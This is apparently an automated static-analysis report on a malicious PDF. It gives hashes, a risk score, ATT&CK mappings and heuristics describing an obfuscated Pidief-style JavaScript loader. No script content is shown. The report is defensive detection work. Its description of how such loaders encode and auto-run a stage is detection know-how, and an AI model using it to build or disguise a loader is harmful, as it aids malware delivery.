Malicious PDF — malware analysis report

Static analysis result for SHA-256 be8b4f49ab83333d…

MALICIOUS

PDF

7.8 KB, first seen: 2026-05-09
MD5: 09946ee0b85ca72ab59050a87803cb6d
SHA-1: eedf404139997400e111b9d1db2bc82143dfc3f6
SHA-256: be8b4f49ab83333d107505a937a961c6457c47b93e5cfdb1ff4a4f773ebbd6c9
Risk Score: 86

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1204.002 Malicious File

The PDF file was flagged as malicious by an ML classifier with high confidence. Embedded JavaScript was detected, which is often used to download and execute further malicious content. The JavaScript appears to be obfuscated, but the presence of a large array named 'z5BCEvT' suggests it contains encoded data or instructions. The primary attack pattern is likely the execution of this embedded script.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 3

  • Obfuscated Pidief-style JavaScript loader (stage not decoded) | high | CVE related | PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER
    PDF JavaScript carries a large opaque encoded stage (a large numeric character-code array feeding an auto-run script) that is built to be decoded and eval'd, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family — a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap-spray pushes it to malicious.
  • JavaScript action | low | 1 related finding | PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream | low | PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: javascript_obj0069_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 69 at offset 0x1BE
Size: 5717 bytes
SHA-256: 0bda2b4e2d9d23b3ca1e8b63bf6c2e39d6f32697e66ce7ca887acbbb8e34cf08
Preview script
First 1,000 lines of the extracted script